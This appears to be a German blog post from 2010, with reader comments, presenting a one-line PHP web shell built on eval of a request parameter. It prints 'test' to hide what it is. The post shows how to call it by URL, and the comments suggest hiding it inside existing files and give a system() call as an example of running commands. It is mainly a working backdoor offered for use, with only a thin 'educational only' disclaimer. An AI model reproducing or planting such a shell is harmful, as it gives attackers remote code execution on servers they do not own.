9Feb/102
Micro PHP Shell – Stand-Alone
Hier möchte ich kurz mal eine neue PHP-Shell euch vorstellen. Es handelt sich dabei um eine "Stand-Alone" PHP Shell, die sich auch noch in gewisser maßen "tarnt".
test<?php @eval($_POST[code]);?>
Bei einem direkten Aufruf bekommt man ein "test" zurück. Man könnte hier auch einfachen eigenen HTML Code mitgeben. Die Shell wird ganz normal aufgerufen mit folgendem Befehl:
http://www.deine-webseite-und-nur-deine.de/shell.php?code=[foo]
Wir immer aus der Reihe der Micro PHP Shells möchte ich euch darauf hinweisen, dass ihr die Shells nur zu edukativen Zwecken verwenden werden dürfen.
Mai 20th, 2010
Dein Script ist so leider nicht richtig entweder du änderst das $_POST in $_GET um oder es wird so wie von dir erklärt nicht funktionieren. Btw ist es schwachsinn dort noch test auszugeben man kann den Code einfach in bestehende Files reinpacken.
Ciao
September 7th, 2010
Schliesse mich da Gunner an.
/* shell.php */
Mit diesen kleinen Code kann man dann Fremmdcode auf dem Server ausführen.
Bsp:
http://localhost/shell.php?code=system(“ver”);